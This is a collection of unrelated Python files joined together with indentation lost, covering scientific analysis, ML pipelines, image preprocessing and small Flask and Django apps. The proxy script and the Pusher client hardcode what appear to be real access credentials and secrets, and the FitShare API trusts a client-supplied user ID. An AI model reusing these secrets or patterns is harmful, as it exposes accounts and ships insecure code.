save_data(self.ode_data_norm, "m-norm")
save_data(self.ode_data_chen, "m-norm-c")
pass
elif model == "av":
for index in range(self.point_number - 100):
Ax = np.zeros([98, 2])
Bx = np.zeros([98, 1])
Ay = np.zeros([98, 2])
By = np.zeros([98, 1])
Az = np.zeros([98, 2])
Bz = np.zeros([98, 1])
A = np.zeros([98, 2])
B = np.zeros([98, 1])
for time_step in range(len(self.purified_pressure.keys()) - 2):
point_cloud1 = self.full_dataset["data"][time_step][index, :3]
point_cloud2 = self.full_dataset["data"][time_step + 1][index, :3]
point_cloud3 = self.full_dataset["data"][time_step + 2][index, :3]
pressure = self.full_dataset["data"][time_step + 1][index, 3] * 0.0001
normal = self.full_dataset["data"][time_step + 1][index, 4:]
# pressure assert to have same direction with a
dx1 = point_cloud2 - point_cloud1
dx2 = point_cloud3 - point_cloud2
dx = 0.5 * (dx1 + dx2)
v = dx / t
a_ = (dx2 - dx1) / t ** 2
Ax[time_step, 0] = abs(a_[0])
Ax[time_step, 1] = v[0]
Bx[time_step] = abs(pressure * normal[0])
Ay[time_step, 0] = abs(a_[1])
Ay[time_step, 1] = v[1]
By[time_step] = abs(pressure * normal[1])
Az[time_step, 0] = abs(a_[2])
Az[time_step, 1] = v[2]
Bz[time_step] = abs(pressure * normal[2])
A[time_step, 0] = np.linalg.norm(a_) * 1
A[time_step, 1] = np.linalg.norm(v) * ((a_ / np.linalg.norm(a_)) @ (v / np.linalg.norm(v)))
B[time_step] = np.linalg.norm(pressure * normal @ (a_ / np.linalg.norm(a_)))
ans_x = np.linalg.solve(Ax.T @ Ax, Ax.T @ Bx)
self.ode_data_x.append([float(ans_x[0]), float(ans_x[1])])
ans_y = np.linalg.solve(Ay.T @ Ay, Ay.T @ By)
self.ode_data_y.append([float(ans_y[0]), float(ans_y[1])])
ans_z = np.linalg.solve(Az.T @ Az, Az.T @ Bz)
self.ode_data_z.append([float(ans_z[0]), float(ans_z[1])])
self.ode_data_norm.append([np.sqrt(
ans_x[0] ** 2 + ans_y[0] ** 2 + ans_z[0] ** 2),
np.sqrt(ans_x[1] ** 2 + ans_y[1] ** 2 + ans_z[1] ** 2)])
ans_chen = np.linalg.solve(A.T @ A, A.T @ B)
self.ode_data_chen.append([float(ans_chen[0]), float(ans_chen[1])])
save_data(self.ode_data_x, "m-mu-x")
save_data(self.ode_data_y, "m-mu-y")
save_data(self.ode_data_z, "m-mu-z")
save_data(self.ode_data_norm, "m-mu-norm")
save_data(self.ode_data_chen, "m-mu-norm-c")
pass
pass
def analysis_ensemble_kalman_filter(self):
self.dataset = self.dataset
print("Here is DataManager.Analysis.DeepAnalysis.analysis_ensemble_kalman_filter!")
# TODO EnKF model
# TODO save analyzed data
pass
class Preprocessor(Analysis):
def __init__(self, data_name):
super().__init__(data_name)
"""
p0=(x0,y0,z0)
v0=(ex,ey,ez)
p(x,y,z)
((p+k*v0)-p0)@v0=0
==>k=(p0-p)@v0/|v0|
==>p`=p+k*v0
v0:(rcost,rsint,sqrt(1-r**2)), r in (0,1), t in (0,2pi)
p0:R*v0 + C(x~,y~,z~), Any constant R > max(|p-C|)
for p in geometry:
calculate p`
for all p`:
c`=avg(p`)
create resolution image
find maxlikelyhood distance(spin the image and calculate costfunction)
iteration until r and t calculated
figure out least cost
that direction is required
cost function:
cost = sum(0.5*sin(pi/180)*(cd-ab))
a,b,c,d = p1-c`,p2-c`,p3-c`,p4-c`
"""
def project(self):
from PIL import Image
import numpy as np
raw_image = Image.open("M02shape.png")
image = np.array(raw_image, dtype=np.int32)
pad = np.zeros([image.shape[0] + 2, image.shape[1] + 2])
for i in range(image.shape[0]):
for j in range(image.shape[1]):
if image[i, j, 0] == image[i, j, 1] == image[i, j, 2] == 255:
pass
else:
pad[i + 1, j + 1] = 255
kernel = np.reshape(np.array([-1, -1, -1, -1, 8, -1, -1, -1, -1]), [9, 1])
boundary_image = np.zeros([image.shape[0], image.shape[1]])
for i in range(boundary_image.shape[0]):
for j in range(boundary_image.shape[1]):
value = np.reshape(pad[i:i + 3, j:j + 3], [1, 9]) @ kernel
boundary_image[i, j] += value
data = [self.data[key][0] for key in self.data.keys()]
data = [i[3 * j:3 * j + 3] for i in data for j in range(int(len(i) / 3 - 1))]
data = np.array(data, dtype=np.float32)
r_ = [0.1 * i for i in range(1, 11)] # 0.1-1
t_ = [3.141592653589793 / 30 * i for i in range(60)] # 0-2pi
c = np.array([np.mean(data[:, 0]), np.mean(data[:, 1]), np.mean(data[:, 2])])
R = 100
cost_ans = []
project_log = []
for r in r_:
for t in t_:
"""
def the vector vertical with v0 and have max projection on z-axis as 'base yaxis' for image
x=-cos(t)*sqrt((1-r**2))
y=-sin(t)*sqrt((1-r**2))
z=r
def the vector vertical with v0, 'base yaxis' and satisfy right hand rule
x=-sin(t)
y=-cos(t)
z=0
"""
v0 = np.array([r * np.cos(t), r * np.sin(t), np.sqrt(1 - r ** 2)]) # the other is -np.sqrt(1-a**2)
base_y_axis = np.array([-np.cos(t) * np.sqrt(1 - r ** 2), -np.sin(t) * np.sqrt(1 - r ** 2), r])
base_x_axis = np.array([-np.sin(t), np.cos(t), 0])
p0 = R * v0 + c
shadow = [p + (p0 - p) @ v0 * v0 for p in data]
shadow = np.array(shadow, dtype=np.float32) # all points on a plane
center = np.array([np.mean(shadow[:, 0]), np.mean(shadow[:, 1]), np.mean(shadow[:, 2])])
image_array = np.zeros([548, 870]) # size of operation image
image_center = [548 / 2, 870 / 2] # center of operation image boundary
relative_shadow = np.array([shadow[i] - center for i in range(shadow.shape[0])],
dtype=np.float32) # delta x,y,z
# convert 3d(x,y,z) to 2d(x,y)
temp = np.array([[item @ base_x_axis, item @ base_y_axis] for item in relative_shadow])
dx = np.max(temp[:, 0]) - np.min(temp[:, 0])
dy = np.max(temp[:, 1]) - np.min(temp[:, 1])
resolution = min(dx, dy) / max(boundary_image.shape)
image_temp = []
for i in range(boundary_image.shape[0]):
for j in range(boundary_image.shape[1]):
if boundary_image[i, j] >= 200:
image_temp.append([(j - 435) * resolution, (274 - i) * resolution])
# clear rubbish
opt_array = np.array(image_temp)
start_point = np.array([np.max(opt_array[:, 0]), 0])
clean_list = [start_point]
while True:
max_distance = 0
selected_point = 0
cache = []
for step, point in enumerate(image_temp):
point = np.array(point)
d = np.linalg.norm(point - start_point)
if 4 * resolution > d: # 4 is experience
cache.append(step)
if 4 * resolution > d > max_distance:
selected_point = point
max_distance = d
try:
assert type(selected_point) is np.ndarray
clean_list.append(selected_point)
cache.reverse()
for item in cache:
image_temp.pop(item)
start_point = selected_point
except AssertionError:
break
print("clean_list_test_length:", len(clean_list))
# move image-center to center
image_temp = np.array(clean_list)
movement = np.array([np.mean(image_temp[:, 0]), np.mean(image_temp[:, 1])])
for i in range(image_temp.shape[0]):
image_temp[i] -= movement
# debug
debug = []
for dbg in temp:
debug.append([dbg[0], dbg[1], 0, 1])
for dbg in image_temp:
debug.append([dbg[0], dbg[1], 0, 2])
import csv
with open("test{}-{}.csv".format(r, t), "w", newline="") as f:
csv_writer = csv.writer(f)
for row in debug:
csv_writer.writerow(row)
print("image range:", np.max(image_temp[:, 0]), np.min(image_temp[:, 0]), np.max(image_temp[:, 1]),
np.min(image_temp[:, 1]))
# TODO calculate cost function
point_pairs = []
for i in range(image_temp.shape[0]):
p0 = image_temp[i]
x0 = p0[0]
y0 = p0[1]
max_distance = 0
p1 = 0
for item in temp:
x = item[0]
y = item[1]
if np.sign(x0) == np.sign(x) and np.sign(y0) == np.sign(y):
if abs(y0 * (x - x0) - x0 * (y - y0)) <= 3 * resolution:
d = np.linalg.norm(item)
if d > max_distance:
p1 = item
max_distance = d
try:
assert type(p1) is np.ndarray
point_pairs.append([p0, p1])
except AssertionError:
raise AssertionError
print("pairs length:", len(point_pairs))
# cost function:
last = 0
times = 0
res = []
log = []
while True:
cost_list = []
scale_history = 1
for theta in [np.pi / 180 * i for i in range(360)]:
spin = np.array([[np.cos(theta), -np.sin(theta)],
[np.sin(theta), np.cos(theta)]])
cost = 0
for i in range(len(point_pairs) - 1):
p1, p3 = point_pairs[i].copy()
p2, p4 = point_pairs[i + 1].copy()
p1 = spin @ p1
p2 = spin @ p2
cost += abs(np.sin(np.pi * 2 / len(point_pairs)) *
(np.linalg.norm(p3) * np.linalg.norm(p4) -
np.linalg.norm(p1) * np.linalg.norm(p2)))
cost_list.append(cost)
print(min(cost_list))
if times == 0:
last = min(cost_list)
times += 1
scale_factor = 1.1
scale_history *= scale_factor
for i in range(len(point_pairs)):
point_pairs[i][0] *= scale_factor
else:
if min(cost_list) >= last:
scale_factor = 1 / scale_factor
if min(cost_list) <= last:
scale_factor = scale_factor
scale_history *= scale_factor
for i in range(len(point_pairs)):
point_pairs[i][0] *= scale_factor
last = min(cost_list)
times += 1
res.append(last)
log.append([cost_list.index(min(cost_list)) * np.pi / 180, scale_history]) # theta, scale-history
if times == 20:
break
cost = int(min(res))
cost_ans.append(cost)
project_log.append([r, t, resolution, movement, *log[res.index(min(res))]])
print("min(cost_ans)")
print(min(cost_ans))
print(cost_ans)
print(min(cost_ans))
print(res)
print(cost_list)
# analysis cost:
r0 = project_log[cost_list.index(min(cost_list))][0]
t0 = project_log[cost_list.index(min(cost_list))][1]
resolution = project_log[cost_list.index(min(cost_list))][2]
move_vector = project_log[cost_list.index(min(cost_list))][3]
theta = project_log[cost_list.index(min(cost_list))][4]
scale_factor = project_log[cost_list.index(min(cost_list))][5]
print("r", r0, "t", t0, "resolution", resolution, "move", move_vector, "spin-angle", theta, "scale",
scale_factor)
"""
import csv
with open("test1.csv", "w", newline="") as f:
csv_writer = csv.writer(f)
for i in range(temp.shape[0]):
csv_writer.writerow(temp[i])
for i in range(image_temp.shape[0]):
csv_writer.writerow(image_temp[i])
dx = np.max(shadow[:, 0]) - np.min(shadow[:, 0])
dy = np.max(shadow[:, 1]) - np.min(shadow[:, 1])
dz = np.max(shadow[:, 2]) - np.min(shadow[:, 2])
resolution = np.sqrt(dx**2+dy**2+dz**2) / min(image_array.shape) # length of tiny square
theta = [np.pi*2/2001*i for i in range(2000)]
temp = [[item @ base_x_axis, item @ base_y_axis] for item in relative_shadow] # TODO important change 3d to 2d point cloud
index = []
for i in theta:
max_distance = 0
point_index = 0
for step, j in enumerate(temp):
if np.tan(i)<=j[1]/j[0]<=np.tan(i+np.pi*2/2001):
distance = j[0]**2+j[1]**2
if distance>max_distance:
point_index = step
max_distance = distance
index.append(point_index)
print(index)
print(len(index))
votex = np.sqrt(3) / 3 * resolution
subsample = [shadow[i*10] for i in range(shadow.shape[0]//10)]
# up=274 down=273 left=435 right=434
for i in range(image_array.shape[0]):
for j in range(image_array.shape[1]):
cell_center = center + base_y_axis * resolution * (274-i) + base_x_axis * resolution * (j-435)
min_x = cell_center[0] - votex
max_x = cell_center[0] + votex
min_y = cell_center[1] - votex
max_y = cell_center[1] + votex
min_z = cell_center[2] - votex
max_z = cell_center[2] + votex
for d in index:
point = shadow[d]
if min_x <= point[0] <= max_x and min_y <= point[1] <= max_y and min_z <= point[2] <= max_z:
image_array[i, j] = 255
if i%100==0:
from PIL import Image
image = Image.fromarray(image_array)
image.show()
"""
class Console:
def __init__(self):
self.console()
pass
def console(self):
print("This is a python console, call Gui() to enter your code.")
print("Code saved as '.text' attribute of Gui object.")
import traceback
while True:
my_code = input(">>>")
if my_code == "exit" or my_code == "quit":
break
try:
execute_times = 0
try:
answer = eval(my_code)
if answer is not None:
print(answer)
execute_times += 1
except:
pass
if execute_times == 0:
exec(my_code)
except:
traceback.print_exc()
return
class Gui:
def __init__(self):
self.text = None
import tkinter
root = tkinter.Tk()
root.geometry("300x450")
root.title("Text Editor")
self.inbox = tkinter.Text(root, width=42, height=32)
button1 = tkinter.Button(root, text="apply", width=41)
self.inbox.place(x=0, y=0)
button1.place(x=0, y=420)
button1.bind('<Button-1>', lambda event: self.get_data(event))
root.mainloop()
def get_data(self, event):
self.text = self.inbox.get('1.0', 'end')
def restart(self):
import tkinter
root = tkinter.Tk()
root.geometry("300x450")
root.title("Text Editor")
self.inbox = tkinter.Text(root, width=42, height=32)
button1 = tkinter.Button(root, text="apply", width=41)
self.inbox.place(x=0, y=0)
button1.place(x=0, y=420)
button1.bind('<Button-1>', lambda event: self.get_data(event))
root.mainloop()
a = Preprocessor("Mie02")
a.project()
Console()
|
import torch.utils.data
import torch
from torch.utils.data import Dataset
class Data_Utility(Dataset):
'''
returns [samples, labels]
'''
def __init__(self, input_size, output_size, encode_length, time_steps, data):
self.input_size = input_size
self.output_size = output_size
self.time_steps = time_steps
self.encode_length = encode_length
window = self.time_steps
horizon = self.time_steps - self.encode_length
x_shape = len(data) - window - horizon
X = torch.zeros((x_shape, window))
Y = torch.zeros((x_shape, horizon))
for i in range(x_shape):
start = i
end = start + window
X[i, :] = torch.from_numpy(data[start:end])
Y[i, :] = torch.from_numpy(data[end:end + horizon])
self.inputs = torch.reshape(X, (x_shape, window, self.input_size))
self.outputs = torch.reshape(Y, (x_shape, horizon, self.output_size))
def __getitem__(self, index):
s = {
'inputs': self.inputs[index],
'outputs': self.outputs[index],
}
return s
def __len__(self):
return self.inputs.shape[0]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Sep 16 14:01:22 2020
@author: base
#--------------------------------
# If the link to the model should fail , it can be loaded and save with the following:
import subprocess
import sys
def install(git+https://github.com/rcmalli/keras-vggface.git):
subprocess.check_call([sys.executable, "-m", "pip", "install", package])
from keras_vggface.vggface import VGGFace
pretrained_model = VGGFace(model='resnet50', include_top=False, input_shape=(224, 224, 3), pooling='avg') # pooling: None, avg or max
#pretrained_model.summary()
pretrained_model.save("my_model.h5") #using h5 extension
#-----------------------
"""
import tensorflow as tf
import cv2
from keras_vggface.utils import preprocess_input
import numpy as np
from pathlib import Path
print(tf.version.VERSION)
if tf.__version__.startswith('1.15'):
# This prevents some errors that otherwise occur when converting the model with TF 1.15...
tf.enable_eager_execution() # Only if TF is version 1.15
path_to_model=Path('my_model.h5')
path_to_img=Path('000002.jpg')
print(tf.version.VERSION)
if path_to_model.is_file():
if tf.__version__.startswith('2.'):
converter = tf.compat.v1.lite.TFLiteConverter.from_keras_model_file(path_to_model) #works now also with TF2.x
if tf.__version__.startswith('1.'):
converter = tf.lite.TFLiteConverter.from_keras_model_file(path_to_model)
else:
print('Please add the my_model.h5 to the working directory or change the path')
def representative_dataset_gen():
if path_to_img.is_file():
for _ in range(10):
img=cv2.imread(path_to_img)
img = np.expand_dims(img, axis=0).astype('float32')
img = preprocess_input(img, version=2)
yield [img]
else:
print('Please add the example image or a 224x224 image to the working directory or change the path')
converter.optimizations = [tf.lite.Optimize.DEFAULT]
converter.representative_dataset = representative_dataset_gen
converter.target_spec.supported_ops = [tf.lite.OpsSet.TFLITE_BUILTINS_INT8]
converter.experimental_new_converter = True
converter.target_spec.supported_types = [tf.int8]
converter.inference_input_type = tf.int8
converter.inference_output_type = tf.int8
quantized_tflite_model = converter.convert()
if tf.__version__.startswith('1.'):
open("tf1_15_3_all_int8.tflite", "wb").write(quantized_tflite_model)
if tf.__version__.startswith('2.'):
open("tf220_all_int8.tflite", 'wb') .write(quantized_tflite_model)# mit 220 vs 2_2_0 Ich hatte im modelcode dtype int32 und int8 eingefüght. Jetzt wieder draußen |
""" Module for removing background from image as a pre-processing step"""
import numpy as np
import cv2 as cv
def crop_image(img):
""" finds the max contour and crops image """
gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)
_, threshed = cv.threshold(gray, 240, 255, cv.THRESH_BINARY_INV)
kernel = cv.getStructuringElement(cv.MORPH_ELLIPSE, (11, 11))
morphed = cv.morphologyEx(threshed, cv.MORPH_CLOSE, kernel)
cnts = cv.findContours(morphed, cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE)[-2]
cnt = sorted(cnts, key=cv.contourArea)[-1]
x, y, w, h = cv.boundingRect(cnt)
dst = img[y:y+h, x:x+w]
cv.imwrite("001.png", dst)
return dst
def remove_background(img):
""" remove background from image """
mask = np.zeros(img.shape[:2], np.uint8)
bgdModel = np.zeros((1, 65), np.float64)
fgdModel = np.zeros((1, 65), np.float64)
rect = (50, 50, 450, 290)
cv.grabCut(img, mask, rect, bgdModel, fgdModel, 5, cv.GC_INIT_WITH_RECT)
mask2 = np.where((mask == 2)|(mask == 0), 0, 1).astype('uint8')
img = img*mask2[:, :, np.newaxis]
return img
def main():
""" main function """
img = cv.imread("TestImages/1.jpg")
img = crop_image(img)
img = remove_background(img)
cv.imshow(img)
cv.waitKey(0)
if __name__ == "__main__":
main()
|
from codec import dump, dumps, load, loads
from codec import GeoJSONEncoder
from geometry import Point, LineString, Polygon
from geometry import MultiLineString, MultiPoint, MultiPolygon
from geometry import GeometryCollection
from feature import Feature, FeatureCollection
from base import GeoJSON
|
#!/usr/bin/env python
import sys
from sets import Set
if len(sys.argv) != 3:
print "Usage: {} <dataset> <output>".format(sys.argv[0])
print " dataset: File containing the data whose duplicates will be " \
"removed."
print " output: File where output data will be stored."
exit(1)
else:
dataset = open(sys.argv[1], 'r')
output = open(sys.argv[2], 'w')
lines = dataset.readlines()
no_dups = Set(lines)
print " Size with duplicates: %d" % len(lines)
print " Size without duplicates: %d" % len(no_dups)
for l in no_dups:
output.write(l)
dataset.close()
output.close()
|
from typing import Any, IO, Text
import io
class GzipFile(io.BufferedIOBase):
myfileobj = ... # type: Any
max_read_chunk = ... # type: Any
mode = ... # type: Any
extrabuf = ... # type: Any
extrasize = ... # type: Any
extrastart = ... # type: Any
name = ... # type: Any
min_readsize = ... # type: Any
compress = ... # type: Any
fileobj = ... # type: Any
offset = ... # type: Any
mtime = ... # type: Any
def __init__(self, filename: str = ..., mode: Text = ..., compresslevel: int = ...,
fileobj: IO[str] = ..., mtime: float = ...) -> None: ...
@property
def filename(self): ...
size = ... # type: Any
crc = ... # type: Any
def write(self, data): ...
def read(self, size=...): ...
@property
def closed(self): ...
def close(self): ...
def flush(self, zlib_mode=...): ...
def fileno(self): ...
def rewind(self): ...
def readable(self): ...
def writable(self): ...
def seekable(self): ...
def seek(self, offset, whence=...): ...
def readline(self, size=...): ...
def open(filename: str, mode: Text = ..., compresslevel: int = ...) -> GzipFile: ...
|
from flask import Flask
from flaskext.sqlalchemy import SQLAlchemy
import archie.config
# startup and utils
app = Flask(__name__)
app.config.from_object(archie.config.TestingConfig)
db = SQLAlchemy(app)
import archie.views
import archie.install
# recreate the db from scratch
archie.install.begin()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'Ziga Vucko'
from os.path import basename
from sys import argv
import time
from Util import Logger, Config, Batch, NELLDict, FeaturePreprocessor
t0 = time.time()
logger = Logger(type_='bp')
config = Config(logger=logger)
config.load()
nell = NELLDict(logger=logger, trace=True)
nell.load()
batch = Batch(logger=logger, n=config.iter_bp)
batch.clean()
batch.load()
nell.update(batch.article_dict)
features_batch = FeaturePreprocessor(logger=logger, type_='batch', n=config.iter_bp)
features_batch.transform(batch.article_dict, nell.entity_categories)
config.stop('bp') # indicate that the batch preprocessor is finished
logger('%s executed successfully in %.2f s.' % (basename(argv[0]), time.time() - t0))
|
from django import forms
from django.contrib import admin
from .models import Card
from django.contrib.auth.admin import UserAdmin as BaseUserAdmin
from django.contrib.auth.models import User
from .models import Profile
# Define an inline admin descriptor for Employee model
# which acts a bit like a singleton
class ProfileInline(admin.StackedInline):
model = Profile
can_delete = False
verbose_name_plural = 'profile'
class UserAdmin(BaseUserAdmin):
inlines = (ProfileInline,)
class CardAdminForm(forms.ModelForm):
class Meta:
model = Card
exclude = ('owner', 'last_bid',)
def clean(self):
card_type = self.cleaned_data.get('card_type')
if card_type == "Player":
icc_ranking = self.cleaned_data.get('icc_ranking')
country = self.cleaned_data.get('country')
ipl_team = self.cleaned_data.get('ipl_team')
if not icc_ranking:
raise forms.ValidationError("Enter the ICC Ranking")
if not country:
raise forms.ValidationError("Enter the Country")
if not ipl_team:
raise forms.ValidationError("Enter the IPL Team")
if card_type == "Country":
icc_ranking = self.cleaned_data.get('icc_ranking')
if not icc_ranking:
raise forms.ValidationError("Enter the ICC Ranking")
return self.cleaned_data
# 0-Board; 1-Country; 2-Rest
class CardAdmin(admin.ModelAdmin):
form = CardAdminForm
def save_model(self, request, obj, form, change):
card_type = form.cleaned_data['card_type']
if card_type == "Board":
obj.last_bid = 0.005
elif card_type == "Country":
obj.last_bid = 0.007
else:
obj.last_bid = 0.005
super().save_model(request, obj, form, change)
admin.site.unregister(User)
admin.site.register(User, UserAdmin)
admin.site.register(Card, CardAdmin)
|
#encoding:utf+8
import requests
def main():
import requests
# 要访问的目标页面
targetUrl = "http://test.abuyun.com"
# targetUrl = "http://proxy.abuyun.com/switch-ip"
# targetUrl = "http://proxy.abuyun.com/current-ip"
# 代理服务器
proxyHost = "http-pro.abuyun.com"
proxyPort = "9010"
# 代理隧道验证信息
proxyUser = "H2S5599U2AHJ83LP"
proxyPass = "B096A6369FF333EC"
proxyMeta = "http://%(user)s:%(pass)s@%(host)s:%(port)s" % {
"host": proxyHost,
"port": proxyPort,
"user": proxyUser,
"pass": proxyPass,
}
proxies = {
"http": proxyMeta,
"https": proxyMeta,
}
#添加ip
header={
"Proxy-Switch-Ip":"yes"
}
resp = requests.get(targetUrl, proxies=proxies,headers=header)
print(resp.status_code)
print(resp.text)
# a=resp.text.split(',')
# print(a)
# targetUrl1="http://test.abuyun.com"
# https_proxies={
# "http":"%s:%s"%(a[0],proxyPort),
# "https":"%s:%s" % (a[0], proxyPort)
# }
#
# print("代理IP为%s"%https_proxies)
# resp1=requests.get(targetUrl1,proxies=https_proxies)
#
# print(resp1.status_code)
# print(resp1.text)
#
if __name__ == '__main__':
main() |
import numpy as np
import pandas as pd
from sklearn.pipeline import make_pipeline
from sklearn.experimental import enable_hist_gradient_boosting
from sklearn.ensemble import HistGradientBoostingClassifier, HistGradientBoostingRegressor
from sklearn.impute import SimpleImputer
from sklearn.preprocessing import StandardScaler
import sklearn.metrics as metrics
train_data = pd.read_csv('./datasets/train_features.csv')
labels = pd.read_csv('./datasets/train_labels.csv')
test_data = pd.read_csv('./datasets/test_features.csv')
def features_engineering(data, n):
x = []
features = [np.nanmedian, np.nanmean, np.nanvar, np.nanmin, np.nanmax]
for index in range(int(data.shape[0] / n)):
patient_data = data[n * index: n * (index + 1), 2:]
feature_values = np.empty((len(features), data[:, 2:].shape[1]))
for i, feature in enumerate(features):
feature_values[i] = feature(patient_data, axis=0)
x.append(feature_values.ravel())
return np.array(x)
x_train = features_engineering(train_data.to_numpy(), 12)
x_test = features_engineering(test_data.to_numpy(), 12)
# Task 1
task1_labels = ['LABEL_BaseExcess', 'LABEL_Fibrinogen', 'LABEL_AST', 'LABEL_Alkalinephos', 'LABEL_Bilirubin_total',
'LABEL_Lactate', 'LABEL_TroponinI', 'LABEL_SaO2', 'LABEL_Bilirubin_direct', 'LABEL_EtCO2']
y_train = labels[task1_labels].to_numpy()
pipeline = make_pipeline(SimpleImputer(strategy='median'), StandardScaler(), HistGradientBoostingClassifier(l2_regularization=1.0))
# for i, label in enumerate(task1_labels):
# scores = cross_val_score(pipeline, x_train, y_train[:, i], cv=5, scoring='roc_auc', verbose=True)
# print("Cross-validation score is {score:.3f},"
# " standard deviation is {err:.3f}"
# .format(score = scores.mean(), err = scores.std()))
df = pd.DataFrame({'pid': test_data.iloc[0::12, 0].values})
for i, label in enumerate(task1_labels):
pipeline.fit(x_train, y_train[:, i].ravel())
# print("Training score:", metrics.roc_auc_score(y_train[:, i], pipeline.predict_proba(x_train)[:, 1]))
predictions = pipeline.predict_proba(x_test)[:, 1]
df[label] = predictions
# Task 2
task2_labels = ['LABEL_Sepsis']
y_train = labels[task2_labels].to_numpy().ravel()
pipeline = make_pipeline(SimpleImputer(strategy='median'), StandardScaler(), HistGradientBoostingClassifier(l2_regularization=1.0))
# scores = cross_val_score(pipeline, x_train, y_train, cv=5, scoring='roc_auc', verbose=True)
# print("Cross-validation score is {score:.3f},"
# " standard deviation is {err:.3f}"
# .format(score = scores.mean(), err = scores.std()))
pipeline.fit(x_train, y_train)
predictions = pipeline.predict_proba(x_test)[:, 1]
# print("Training score:", metrics.roc_auc_score(y_train, pipeline.predict_proba(x_train)[:, 1]))
df[task2_labels[0]] = predictions
# Task 3
task3_labels = ['LABEL_RRate', 'LABEL_ABPm', 'LABEL_SpO2', 'LABEL_Heartrate']
y_train = labels[task3_labels].to_numpy()
pipeline = make_pipeline(SimpleImputer(strategy='median'), StandardScaler(), HistGradientBoostingRegressor(max_depth=3))
# for i, label in enumerate(task3_labels):
# scores = cross_val_score(pipeline, x_train, y_train[:, i],
# cv=5,
# scoring='r2',
# verbose=True)
# print("Cross-validation score is {score:.3f},"
# " standard deviation is {err:.3f}"
# .format(score = scores.mean(), err = scores.std()))
for i, label in enumerate(task3_labels):
pipeline.fit(x_train, y_train[:, i])
predictions = pipeline.predict(x_test)
# print("Training score:", metrics.r2_score(y_train[:, i], pipeline.predict(x_train)))
df[label] = predictions
compression_options = dict(method='zip', archive_name='prediction.csv')
df.to_csv('prediction.zip', index=False, float_format='%.3f', compression=compression_options)
|
# file that holds all the routes of the API
from flask import Blueprint, jsonify, request
from bson import json_util
import json
import aws
import index
fitShare_api = Blueprint('fitshare_api', __name__)
######################################################################################
# #
# All FitShare GET Routes to RETRIEVE from cloud DB and cloud Services #
# #
######################################################################################
@fitShare_api.route("/api/allPrograms")
def getAllPrograms():
allPrograms = index.mongo.db.Programs
response = []
output = allPrograms.find({})
for document in output:
newDoc = json.loads(json_util.dumps(document))
response.append(newDoc)
return jsonify(response)
@fitShare_api.route("/api/sponsoredPrograms")
def getSponsoredPrograms():
sponsoredPrograms = index.mongo.db.SponsoredPrograms
response = []
output = sponsoredPrograms.find({})
for document in output:
newDoc = json.loads(json_util.dumps(document))
response.append(newDoc)
return jsonify(response)
@fitShare_api.route("/api/discoverTrainers")
def discoverTrainers():
trainers = index.mongo.db.Users
response = []
output = trainers.find({})
for document in output:
newDoc = json.loads(json_util.dumps(document))
response.append(newDoc)
return jsonify(response)
######################################################################################
# #
# All FitShare POST Routes to Update cloud DB and cloud Services #
# #
######################################################################################
# route that uploads files to AWS S3/Updates DB
@fitShare_api.route("/api/upload", methods=['POST'])
def uploader():
# check to see if the request has a file
if 'file' not in request.files:
print "no file part"
else:
# start parsing the request for data we need
file = request.files['file']
userID = request.form['userID']
price = request.form['Price']
intPrice = int(price) # convert string to int for DB
# call our AWS module to handle upload to S3 bucket - returns file url and name
response = aws.uploadFile(file.filename, file)
# create a reference to our mongo DB collections
Users = index.mongo.db.Users
allPrograms = index.mongo.db.Programs
# go into users, update the courses they offer, push the new course they teaching/offering
Users.update_one({'_id': userID}, {
'$push': {'courses': {"name": request.form['programName'], "file": response['file']}}}, upsert=True)
# an mongo db document model to insert the data we get from the request on client side
insertionModel = {
"name": request.form['programName'],
"price": intPrice,
"description": request.form['Description'],
"trainer": request.form['Name'],
"file": response['file']
}
allPrograms.insert_one(insertionModel)
# retrieve and return the user that has all updated info.
doc = Users.find_one({"_id": userID})
user = json.loads(json_util.dumps(doc))
return jsonify(user)
# route that contacts AWS cognito services to register user
@fitShare_api.route("/api/registerUser", methods=['POST'])
def registerUser():
newUser = {}
data = request.get_json()
# use our AWS module's function to register use in Cognito - returns user UID
response = aws.createUser(data['email'], data['password'])
# parse other data from request
newUser['Full-Name'] = data['name']
newUser['email'] = data['email']
Users = index.mongo.db.Users # get a ref to user collection
# insert the new user into the database - the _id is the UID generated from Cognito so all user UID's match
Users.insert_one(
{"_id": response, "email": data["email"], "name": data['name']})
return 'done'
# route that authenticates a user in AWS Cognito
@fitShare_api.route("/api/authenticateUser", methods=['POST'])
def authenticateUser():
data = request.get_json() #convert request so we can parse
response = aws.authenticateUser(data['email'], data['password']) # use aws cognito module to get token/ authenticate on backend - returns user UID
#now we search the database to get the user document and send it back for client
Users = index.mongo.db.Users
doc = Users.find_one({"_id": response})
user = json.loads(json_util.dumps(doc))
return jsonify(user)
#Route that updates database for users purchased programs
@fitShare_api.route("/api/purchasedProgram", methods=['POST'])
def purchasedProgram():
#convert and parse data
data = request.get_json()
userID = data['userID']
programName = data['programName']
#reference database info and UPSERT
Users = index.mongo.db.Users
Users.update_one({'_id': userID}, {
'$push': {'purchasedPrograms': programName}}, upsert=True)
# RETURN the updated user back to client
user = Users.find_one({"_id": userID})
updatedUser = json.loads(json_util.dumps(user))
return jsonify(updatedUser)
|
import pusher
class Pusher:
pusher_client = None
@classmethod
def create_instance(cls):
cls.pusher_client = pusher.Pusher(
app_id='732495',
key='4df52d9bd8bcf616c85c',
secret='54e285d0324b0e65fcc8',
cluster='eu',
ssl=True
)
print("instance is created")
@classmethod
def get_instance(cls):
if cls.pusher_client is None:
cls.create_instance()
return cls.pusher_client
|
from keras.models import Model
from keras.layers import Input
from keras.layers import Dense
from keras.layers import Conv1D, MaxPooling1D
from keras.layers import GRU, Bidirectional
from keras.optimizers import Adam
import numpy as np
input_layer = Input(shape=(300,26), name='input' )
conv_2d = Conv1D(filters= 64, kernel_size= 5, strides= 5, padding= 'valid')(input_layer)
bi_gru = Bidirectional(GRU(units=64, activation='elu', return_sequences=False))(conv_2d)
dense_1 = Dense(units=32, activation='elu')(bi_gru)
dense_2 = Dense(units=2, activation='sigmoid')(dense_1)
model = Model(input_layer,dense_2)
print(model.summary())
np.random.seed(0)
data = np.random.rand(100,300,26)
label = np.random.randint(0,2,(100,))
optimizer = Adam(lr=0.001)
model.compile(loss='binary_crossentropy', optimizer=optimizer)
model.fit(data,label,epochs=50)
model.save('training_model.h5')
#letrongan
#update
# -------------------------------------------------------------------------------------------------
# from keras.models import Model
# from keras.layers import Input
